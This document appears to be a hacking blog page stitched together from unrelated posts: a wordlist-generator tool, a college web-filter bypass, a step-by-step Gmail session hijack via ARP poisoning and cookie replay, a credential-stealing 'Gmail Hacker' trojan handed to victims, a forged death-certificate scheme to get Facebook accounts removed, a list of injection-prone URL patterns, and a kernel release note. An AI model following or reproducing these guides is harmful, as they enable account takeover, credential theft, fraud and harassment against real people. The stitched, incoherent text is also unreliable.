It seems to be trendy lately to make tools which can create custom or more specific word lists for password cracking, just last week we posted about the web application The Associative Word List Generator (AWLG), which crawls the whole web to look for associated words with a given topic.
This application is more towards creating custom word lists from a specific domain by crawling it for unique words. Basically you give the application a spidering target website and it will collect unique words. The application is written in Ruby and is called CeWL, the Custom Word List generator. The app can spider a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.
IF you combine the info output by CeWL and AWLG with the standard wordlists for password cracking - you should have a fairly comprehensive set.
By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behaviour can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.
Version 2 of CeWL can also create two new lists, a list of email addresses found in mailto links and a list of author/creator names collected from meta data found in documents on the site. It can currently process documents in Office pre 2007, Office 2007 and PDF formats. This user data can then be used to create the list of usernames to be used in association with the password list.
Installation
CeWL needs the rubygems package to be installed along with the following gems:

  • http_configuration
  • mime-types
  • mini_exiftool
  • rubyzip
  • spider
You can download CeWL here:
Download






Recently Our College has uploaded the Cyberoam client on the college server and we cannot access 90% sites through this ... wahtever the site we want to open it says it was blocked by ur Administrator... what the f*ck sites like opera and firefox are blocked... Really ROFL... After Got fked up from this I am giving you all the Detailed and 100% working Hack for cyberoam and how to unblock any site in college as Most of the colleges have cyberoam Installed...

WHAT IS CYBEROAM ??

Cyberoam’s all-inclusive UTM solution offers a well-coordinated defense through tightly integrated best-of-breed security solutions over a single interface -Stateful inspection firewall, VPN, gateway anti-virus, gateway anti-spam, gateway anti-malware, intrusion prevention system (IPS), content filtering, bandwidth management (QoS), multiple link management and enhanced user-based reporting.
That means it maintains records "Who is Doing What" ?

HOW TO UNBLOCK CYBEROAM TO ACCESS BLOCKED SITES ??

First of all I will inform you all that cyberoam is highly secured internet client and it blocks all the types of proxies like http,CGI, socks(4/5), Ftp, highanonimity ...In short All..

As you all know that every Programmer leaves aleast a One Loop Hole in its Programming or software Design . Why I am saying this is beacause Cyberoam has also left this Loop Hole in its Design .. Now what is this loop Hole ??

Its HTTPS Loop HOLE...

HOW HTTPS WILL GOING TO UNBLOCK SITES ??

Https are SSL secured http clients ... and these are most secured Sites on the Network , that's why cyberoam Leaves it ..
Now the Main Point To access the Blocked sites you have to use the Https based Proxies.
Most of Https based Proxies are Paid so to search on Net for free Https Based Proxies is a Waste of Time...
I am Providing You the One Such Free Proxy service to access blocked Sites On the Cyberoam.
So feel free to surf anysite in your college ... the Best thing is that This site will not allow cyberoam Admin to track You ..


Click on the above Link and surf Freely any site in your college...You need to accept the certificate provided by the Site to Use It... As your web web browser show the Certificate accept statement at the First time you visit the Https Site.


Note:-This post is for educational purpose. If you misuse it and get caught I am not
responsible for it. Whatever you do at your own risk.
I hope you know what the cookie is. The method we will be using
is cookie stealing and replaying the same back to the Gmail server. There are
many ways you can steal cookie, one of them is XSS (Cross site scripting)
discussed by other is earlier post. But we won’t be using any XSS here, in our
part of attack we will use some local tool to steal cookie and use that cookie
to get an access to Gmail account.

I assume that:
  • You are in Local Area
    Network (LAN) in a switched / wireless environment : example : office ,
    cyber café, Mall etc.
  • You know basic
    networking.
Tool used for this attack:
  • Cain & Abel
  • Network Miner
  • Firefox
    web browser with Cookie Editor add-ons
Attack in detail:

I assume you are connected to LAN/Wireless network. Our main goal is to capture
Gmail GX cookie from the network. We can only capture cookie when someone is
actually using his gmail. I’ve noticed normally in lunch time in office, or
during shift start people normally check their emails. If you are in cyber café
or in Mall then there are more chances of catching people using Gmail.

We will go step by step,

If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and
routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are
communicating eachother in switch network then Z will not come to know what X &
Y are communicating, so inorder to sniff that communication you would have to
poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning
because Wireless Access points act like HUB which forwards any communication to
all its ports (recipients).
  • Start Cain from Start
    > Program > Cain > Cain
  • Click on Start/Stop
    Snigger tool icon from the tool bar, we will first scan the network to see
    what all IPs are used in the network and this list will also help us to
    launch an attack on the victim.
  • Then click on Sniffer
    Tab then Host Tab below. Right click within that spreadsheet and click on
    Scan Mac Addresses, from the Target section select
All hosts in
my subnet and then press Ok. This will list all host connected in your network.
You will notice you won’t see your Physical IP of your machine in that list.


How to check your physical IP ?

> Click on start > Run type cmd and press enter, in the command prompt type


Ipconfig and enter. This should show your IP address assign to your PC.

It will have following outputs:

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com

IP Address. . . . . . . . . . . . : 192.168.1.2

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.1.1

Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of
IP addresses, here you have to choose any free IP address which is not used
anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.
  • Click on Configure >
    APR > Use Spoof ed IP and MAC Address > IP
Type in
192.168.1.10 and from the poisoning section click on “Use ARP request Packets”
and click on OK.
  • Within the Sniffer Tab
    , below click on APR Tab, from the left hand side click on APR and now click
    on the right hand top spreadsheet then click on plus sign tool from top. The
    moment you click that it will show you list of IP address on left hand side.
    Here we will target the victim IP address and the default gateway.
The purpose is to do ARP poisoning between victim and the default gateway and
route the victim traffic via your machine. From the left side click on Victim IP
address, we assume victim is using 192.168.1.15. The moment you click on victim
IP you will see remaining list on the right hand side here you have to select
default gateway IP address i.e. 192.168.1.1 then click on OK.
  • Finally, Click on
    Start/Stop Sniffer tool menu once again and next click on Start/Stop APR.
    This will start poisoning victim and default gateway.
B] Using Network Miner to capture cookie in
plain text

We are using
Network miner to capture cookie, but Network miner can be used for manythings
from capturing text , image, HTTP parameters, files. Network Miner is normally
used in Passive reconnaissance to collect IP, domain and OS finger print of the
connected device to your machine. If you don’t have Network miner you can use
any other sniffer available like Wireshark, Iris network scanner, NetWitness
etc.
We are using This tool because of its ease to use.
  • Open Network Miner by
    clicking its exe (pls note it requires .Net framework to work).
  • From the “---Select
    network adaptor in the list---“ click on down arrow and select your adaptor
    If you are using Ethernet wired network then your adaptor would have
    Ethernet name and IP address of your machine and if you are using wireless
    then adaptor name would contain wireless and your IP address. Select the one
    which you are using and click on start.
Important thing before you start this make sure you are not
browsing any websites, or using any Instant Mesaging and you have cleared all
cookies from firefox.
  • Click on Credential
    Tab above. This tab will capture all HTTP cookies , pay a close look on
    “Host” column you should see somewhere mail.google.com. If you could locate
    mail.google.com entry then in the same entry right click at Username column
    and click on “copy username” then open notepad and paste the copied content
    there.
  • Remove word wrap from
    notepad and search for GX in the line. Cookie which you have captured will
    contain many cookies from gmail each would be separated by semicolon (;) GX
    cookie will start with GX= and will end with semicolon you would have to
    copy everything between = and semicolon
Example : GX=
axcvb1mzdwkfefv ;
ßcopy only
axcvb1mzdwkfefv
Now we have captured GX cookie its time now to use this cookie and replay the
attack and log in to victim email id, for this we will use firefox and cookie
editor add-ons.

C] Using Firefox &
cookie Editor to replay attack.
  • Open Firefox and log
    in your gmail email account.
  • from firefox click on
    Tools > cookie Editor.
  • In the filter box type
    .google.com and Press Filter and from below list search for cookiename GX.
    If you locate GX then double click on that GX cookie and then from content
    box delete everything and paste your captured GX cookie from stepB.4 and
    click on save and then close.
  • From the Address bar
    of Firefox type mail.google.com and press enter, this should replay victim
    GX cookie to Gmail server and you would get logged in to victim Gmail email
    account.
  • Sorry! You can’t
    change password with cookie attack.
  • ---------------------------------------------------------------------------

A Closer Look at a Vulnerability in Gmail
















Gmail is one of the major webmail service provider across the globe. Here is one small reason for that.
Gmail follows a strict rule that doesn’t allow it’s users to have their first or the last name contain the termGmail or Google. That is, while signing up for a new Gmail account the users cannot choose a first or last name that contains the term Gmail or Google. You can see this from the below snapshot.
This rule is implemented by Gmail for obvious reasons, because if the users are allowed to keep their first or the last name that contains the term Gmail or Google, then it is possible to easily impersonate the identity of Gmail (or Gmail Team) and engage themselves in phising or social engineering attacks on the innocent users. This can be done by simply choosing the first and last name with the following combinations.
First Name Last Name
Gmail Team
Google Team
Gmail Password Assistance
From the above snapshot we can see that, Gmail has made a good move in stopping the users from abusing it’s services. However this move isn’t just enough to prevent the malicious users from impersonating the Gmail’s identity. Because Gmail has a small vulnerability that can be exploited so that the users can still have their name contain the terms Gmail or Google. You may wonder how to do this. But it’s very simple.
1. Login to your Gmail account and click on Settings.
2. Select Accounts tab
3. Click on edit info
4. In the Name field, select the second radio button and enter the name of your choice. Click on Save Changes and you’re done!
Now, Gmail accepts any name even if it contains the term Google or Gmail. You can see from the below snapshot
Allowing the users to have their names contain the terms Gmail or Google is a serious vulnerability even though it doesn’t seem to be a major one. This is because a hacker or a malicious attacker can easily exploit this flaw and send phishing emails to other Gmail users asking for sensitive information such as their passwords. Most of the users don’t even hesitate to send their passwords since they believe that they are sending it to Gmail Team (or someone authorized). But in reality they are sending it to an attacker who uses these information to seek personal benefits.
So the bottomline is, if you get any emails that appears to have come from the Gmail Team or similar, don’t trust them! Anyone can send such emails to fool you and take away your personal details. Hope that Gmail will fix this vulnerability as soon as possible to avoid any disasters.
--------------------------------



Hack Gmail using Gmail Hacker





1. Download the gmail hacker from http://bit.ly/gmailhacker
2. Now, run Gmail Hacker Builder.exe file on your computer to see :



3. Enter in your email address and password (I recommend you to create new Gmail id for this : highly recommended) and hit on Build. Then Gmail hacker builder will create your own Gmail hacker application – Gmail Hacker.exe file which you can use to hack gmail password.
4. Now, send this Gmail Hacker.exe file to victim and tell him that this Gmail hacker is used to hack Gmail password. Ask him to run Gmail Hacker.exe and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he wanna hack).


5. As he enters the information and hits “Hack Them”, he will receive an error message as shown below:






6. In return, you will receive an email in your email account like this:


7. You’re Done!! :D You got his Gmail ID n password!

So try and do leave your feedback guys!



Close FaceBook account(s)



Just Follow the steps:
Step 1 - Go to this url:
http://www.facebook.com/help/contact.php...m=deceased

So this is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone who is dead).

Step 2 - Complete the Fields:

Explain:
Full Name: Your Victims Full name(Name last name)
Date of birth: Go at his profile and click at Info tab and get his date of birth.
Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
Relationship to this person: To make more believable select Immediate Family.
Requested Action: Remove Profile
Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a "Death Certificate" or "Certificate of a Death". It doesn't matters from what country you are, just use this Italian certificate and open up photoshop or whatever Image
Editor and just write in a blank field:
Annunciamo il morte di [name goes here]. Save your image to desktop and upload it in one of the Image
Free Hosting like: http://imageshack.us
And it's done ;)... Italian Death Certificate:
Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.

Step 3 - Click on Submit and then a message will appear:
Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the times. I closed a few ones.


cat.asp?cat=
productlist.asp?catalogid=
Category.asp?category_id=
Category.cfm?category_id=
category.asp?cid=
category.cfm?cid=
category.asp?cat=
category.cfm?cat=
category.asp?id=
index.cfm?pageid=
category.asp?catid=
Category.asp?c=
Category.cfm?c=
productlist.cfm?catalogid=
productlist.asp?catalogid=
viewitem.asp?catalogid=
viewitem.cfm?catalogid=
catalog.cfm?catalogId=
catalog.asp?catalogId=
department.cfm?dept=
department.asp?dept=
itemdetails.cfm?catalogId=
itemdetails.asp?catalogId=
product_detail.asp?catalogid=
product_detail.cfm?catalogid=
product_list.asp?catalogid=
product_list.cfm?catalogid=
ShowProduct.cfm?CatID=
ShowProduct.asp?CatID=
search_results.cfm?txtsearchParamCat=
search_results.asp?txtsearchParamCat=
itemdetails.cfm?catalogId=
itemdetails.asp?catalogId=
store-page.cfm?go=
store-page.asp?go=
Detail.cfm?CatalogID=
Detail.asp?CatalogID=
browse.cfm?category_id=
view.cfm?category_id=
products.cfm?category_id=
index.cfm?Category_ID=
detail.cfm?id=
category.cfm?id=
showitems.cfm?category_id=
ViewProduct.asp?PID=
ViewProduct.cfm?PID=
shopdisplayproducts.asp?catalogid=
shopdisplayproducts.cfn?catalogid=
displayproducts.cfm?category_id=
displayproducts.asp?category_id=
DisplayProducts.asp?prodcat=
DisplayProducts.cfm?prodcat=x
productDetail.cfm?ProductID=
products.php?subcat_id=
showitem.cfm?id=21
productdetail.cfm?pid=
default.cfm?action=46
products_accessories.asp?CatId=
Store_ViewProducts.asp?Cat=
category.cfm?categoryID=
category.asp?category=
tepeecart.cfm?shopid=
view_product.asp?productID=
ProductDetails.asp?prdId=12
products.cfm?ID=
detail.asp?product_id=
product_detail.asp?product_id=
products.php?subcat_id=
product.php?product_id=
view_product.cfm?productID=
product_details.asp?prodid=
shopdisplayproducts.cfm?id=
displayproducts.cfm?id=



Linux Kernel 3.5.3 Is Available for Download
Linux kernel 3.5.3 is now available for download!

Greg Kroah-Hartman announced a couple of days ago, August 25th, the immediate availability for download of the thirdmaintenance release for the stable Linux 3.5 kernel series. 

Linux kernel 3.5.3 includes mostly updated drivers, especially for ATI Radeon and Intel i915 graphics cards, as well as some EXT4 filesystem changes.

"I'm announcing the release of the 3.5.3 kernel. All users of the 3.5 kernel series must upgrade."

"The updated 3.5.y git tree can be found at: git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git linux-3.5.y and can be browsed at the normal kernel.org git web browser:
http://git.kernel.org/?p=linux/kernel/git/stable/linux-stable.git;a=summary" - said Greg KH in the email announcement.

As usual, the Linux kernel 3.5.3 is a must-grab update for all Linux users who use the Linux 3.5 kernel. Therefore, upgrade as soon as possible!

Download Linux kernel 3.5.3 right now


Sample text

မဂၤလာပါ သူငယ္ခ်င္း လိုခ်င္တာရွိရင္ ယူသြားႏိူင္ပါတယ္..

Total Pageviews

သင္႔သေဘာထား

Powered by Blogger.

Pages - Menu

Translate

Popular Posts

Followers

Search BoX

Featured Posts